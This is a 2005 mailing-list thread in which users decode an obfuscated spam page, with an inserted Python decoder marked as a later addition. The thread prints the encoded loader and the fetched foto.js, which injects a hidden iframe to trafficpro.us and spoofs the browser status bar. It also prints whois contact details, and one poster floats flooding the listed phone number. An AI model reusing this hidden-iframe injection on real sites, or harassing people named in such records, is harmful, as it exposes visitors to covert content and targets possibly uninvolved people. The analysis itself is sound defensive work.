Re: decyphering spam
It seems this spam leads to trafficpro.us which is registered by somebody in the UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number

[EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less
Domain Name: TRAFFICPRO.US
Domain ID: D7444563-US
Sponsoring Registrar: SCHLUND + PARTNER AG
Domain Status: ok
Registrant ID: SPAG-4476
Registrant Name: Julie Prescott
Registrant Address1: Orchard Terrace
Registrant Address2: 8
Registrant City: York
Registrant Postal Code: YO51 9AF
Registrant Country: Great Britain (UK)
Registrant Country Code: GB
Registrant Phone Number: +44.1614315155
Registrant Email: [EMAIL PROTECTED]
Registrant Application Purpose: P1
Registrant Nexus Category: C11
Administrative Contact ID: SPAG-4476
Administrative Contact Name: Julie Prescott
Administrative Contact Address1: Orchard Terrace
Administrative Contact Address2: 8
Administrative Contact City: York
Administrative Contact Postal Code: YO51 9AF
Administrative Contact Country: Great Britain (UK)
Administrative Contact Country Code: GB
Administrative Contact Phone Number: +44.1614315155
{etc}

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
michael wrote:
> It seems this spam leads to trafficpro.us which is registered by somebody in the UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number

Or perhaps do a little research first?

The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight
http://www.touchstockport.com/business/list/bid/2964798

The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000

Cheers, Dave

> [EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less
> Domain Name: TRAFFICPRO.US
> Domain ID: D7444563-US
> Sponsoring Registrar: SCHLUND + PARTNER AG
> Domain Status: ok
> Registrant ID: SPAG-4476
> Registrant Name: Julie Prescott
> Registrant Address1: Orchard Terrace
> Registrant Address2: 8
> Registrant City: York
> Registrant Postal Code: YO51 9AF
> Registrant Country: Great Britain (UK)
> Registrant Country Code: GB
> Registrant Phone Number: +44.1614315155
> Registrant Email: [EMAIL PROTECTED]
> Registrant Application Purpose: P1
> Registrant Nexus Category: C11
> Administrative Contact ID: SPAG-4476
> Administrative Contact Name: Julie Prescott
> Administrative Contact Address1: Orchard Terrace
> Administrative Contact Address2: 8
> Administrative Contact City: York
> Administrative Contact Postal Code: YO51 9AF
> Administrative Contact Country: Great Britain (UK)
> Administrative Contact Country Code: GB
> Administrative Contact Phone Number: +44.1614315155
> {etc}
Re: decyphering spam
On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote:
> michael wrote:
> > It seems this spam leads to trafficpro.us which is registered by somebody in the UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number
>
> Or perhaps do a little research first?
>
> The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight
> http://www.touchstockport.com/business/list/bid/2964798
>
> The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
> http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000

I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping!

I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed?
Re: decyphering spam
On Friday 03 June 2005 10:19, michael wrote:
> On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote:
> > michael wrote:
> > > It seems this spam leads to trafficpro.us which is registered by somebody in the UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number
> >
> > Or perhaps do a little research first?
> >
> > The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight
> > http://www.touchstockport.com/business/list/bid/2964798
> >
> > The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
> > http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000
>
> I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping!
>
> I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed?

Nominet are not responsible for .us, only .uk. The registrar seems to be someone in Germany.

David
decyphering spam
how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?

<html>
<head>
<body bgcolor=#080C25>
<script language=javascript>document.write(unescape('%3C%53%43%52%49%50%
54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%
64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27%
29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%
6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%
73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%
20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%
65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%
43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%
29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%
29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%
65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%
3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
</body>
</html>

--
Michael Bane
Atmospheric Physics Group
University of Manchester
Re: decyphering spam
michael wrote:
> how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?

Personally, I used Python's urllib.unquote and got the following:

<SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>

Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivalent decoder for that section. Maybe someone else will jump in? :D

--
Steve C. Lamb | I'm your priest, I'm your shrink, I'm your
PGP Key: 8B6E99C5 | main connection to the switchboard of souls.
Re: decyphering spam
On Thu, 02 Jun 2005 21:18:47 +0100 michael [EMAIL PROTECTED] wrote:
> how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?
>
> <html>
> <head>
> <body bgcolor=#080C25>
> <script language=javascript>document.write(unescape('%3C%53%43%52%49%50%
> 54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%
> 64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27%
> 29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
> 61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%
> 6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%
> 73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%
> 20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%
> 65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%
> 43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%
> 29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%
> 29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%
> 65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%
> 3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>

Each of the %xy groups is a % followed by a byte described in hexadecimal. A little Perl or Python script should be able to decipher it for you pretty quick.

--
- Ron Johnson, Jr.
Jefferson, LA USA
PGP Key ID 8834C06B
I prefer encrypted mail.

Observe good faith and justice toward all nations. Cultivate peace and harmony with all.
George Washington
Re: decyphering spam
On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
> michael wrote:
> > how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?
>
> Personally, I used Python's urllib.unquote and got the following:
>
> <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
>
> dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
>
> Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivalent decoder for that section. Maybe someone else will jump in? :D

That final segment decodes to this:

<SCRIPT LANGUAGE="javascript" SRC="foto.js">
// SAMPLE SCRIPT #2 - CALLING AN EXTERNAL JS FILE
</SCRIPT>

which, unless there was a base reference issued in the actual spam, leads nowhere. :)

--
~ Darryl ~
[EMAIL PROTECTED]
http://smartssa.com / http://darrylclarke.com
Re: decyphering spam
On Thursday June 2 2005 22:18, michael wrote:
> how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?

First, you shove it through that Perl script with the line intact (isn't downloading Videos from secure pages fun...):

#!/usr/bin/perl -w
use strict;
# For every line on stdin, turn each %XX escape into the byte it encodes and
# print it; the /e flag evaluates the replacement part as Perl code.
foreach (<STDIN>) {
    s/\%([0-9a-fA-F]{1,2})/print STDOUT chr(hex($1))/ge;
}

Afterwards, you search the resulting JavaScript fragment for what the dF function actually does. It decodes to this:

<SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT>
<script language="javascript">
function dF(s){
    var s1=unescape(s.substr(0,s.length-1));
    var t= '';
    for(i=0;i<s1.length;i++)
        t += String.fromCharCode( s1.charCodeAt(i)-s.substr(s.length-1,1) );
    document.write(unescape(t));}
</script>

Have fun. I found that it's actually pretty simple to just re-implement whatever it does in a programming language of your choice and just dump everything to stdout.

--
Got Backup?
Jabber: Shadowdancer at jabber.fsinf.de
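The full two-stage decode that the thread works through by hand, as a Python example added here (it is not code posted by anyone in the thread): stage 1 is the %XX decoding Ron and Steve describe, stage 2 is a re-implementation of the dF routine that Darryl and Shadowdancer unpicked. The dF argument and the first 30 escapes of the stage-1 string are copied from michael's post; the helper names, the regexes, and the constructed stand-in page are mine, and the whitespace stripping assumes the only damage to the payload is mail-client line wrapping (michael notes the original was one line).

```python
import re

# Opening 30 escapes of the stage-1 string from michael's post, which
# document.write(unescape(...)) turns into the <SCRIPT ...> tag defining dF.
STAGE1_PREFIX = ("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22"
                 "%6A%61%76%61%73%63%72%69%70%74%22%3E")

# The argument of the dF('...') call, copied from the post. The mail client
# wrapped it and inserted a space after "of%"; the original was one line.
DF_ARG = ("*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I"
          "*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75"
          "KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5")

# Constructed stand-in for the spam page: just the two calls above.
SAMPLE_HTML = ("<script language=javascript>document.write(unescape('"
               + STAGE1_PREFIX + "'));dF('" + DF_ARG + "')</script>")

_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_UNESCAPE_CALL = re.compile(r"unescape\('([^']*)'\)")
_DF_CALL = re.compile(r"\bdF\('([^']*)'\)")


def unwrap(s):
    """Undo mail-client line wrapping by dropping all whitespace
    (assumption: the real payloads contain none)."""
    return re.sub(r"\s+", "", s)


def js_unescape(s):
    """Mirror JavaScript's legacy unescape(): %XX and %uXXXX become the
    character with that code point; anything else is left untouched."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_stage1(s):
    """Stage 1: the %XX string inside document.write(unescape('...'))."""
    return js_unescape(unwrap(s))


def decode_df(s):
    """Stage 2, a re-implementation of the page's dF(s): the last character
    is the shift (JS coerces it to a number in the subtraction), the rest is
    unescaped, every char code is lowered by the shift, and the result is
    unescaped once more."""
    s = unwrap(s)
    shift = int(s[-1])   # a non-digit here gives NaN in JS; we raise instead
    s1 = js_unescape(s[:-1])
    t = "".join(chr(ord(c) - shift) for c in s1)
    return js_unescape(t)


def decode_page(html):
    """Static walk of a page: decode every unescape('...') literal, then
    every dF('...') call, without executing any of the script."""
    layers = []
    for m in _UNESCAPE_CALL.finditer(html):
        layers.append(decode_stage1(m.group(1)))
    for m in _DF_CALL.finditer(html):
        layers.append(decode_df(m.group(1)))
    return layers


if __name__ == "__main__":
    for i, layer in enumerate(decode_page(SAMPLE_HTML), 1):
        print("--- layer %d ---" % i)
        print(layer)
```

Nothing is evaluated: the literals are pulled out with regexes and transformed in Python, so the page's document.write calls never run. On the real message, the second layer comes out as the `<SCRIPT ... SRC="foto.js">` tag Darryl reported, which is the artefact to look for in the rest of the spam.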
Re: decyphering spam
On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote:
> On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
> > michael wrote:
> > > how do i decipher what the following HTML/javascript attempts (original 'write' was all one line)?
> >
> > Personally, I used Python's urllib.unquote and got the following:
> >
> > <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
> >
> > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
> >
> > Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivalent decoder for that section. Maybe someone else will jump in? :D
>
> That final segment decodes to this:
>
> <SCRIPT LANGUAGE="javascript" SRC="foto.js">
> // SAMPLE SCRIPT #2 - CALLING AN EXTERNAL JS FILE
> </SCRIPT>
>
> which, unless there was a base reference issued in the actual spam, leads nowhere. :)

well i can 'wget' the foto.js from the site which is (if anybody is interested!) a bit too simple to decode but those up for the challenge could decipher the index.php

// foto.js as fetched. The list archive stripped the angle brackets and the
// quotes around the URL and the setInterval argument; they are restored here.
// The split strings just reassemble a hidden 1x1 iframe and the stylesheet
// that hides it.
url = "http://www.trafficpro.us/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = ' FR'+'AMEB'+'ORD'+'ER=0 WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type=text/css>';
asd = '<IF'+'RA'+'ME SRC=';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='google.com'",7);

> --
> ~ Darryl ~
> [EMAIL PROTECTED]
> http://smartssa.com / http://darrylclarke.com

--
Michael Bane
Atmospheric Physics Group
University of Manchester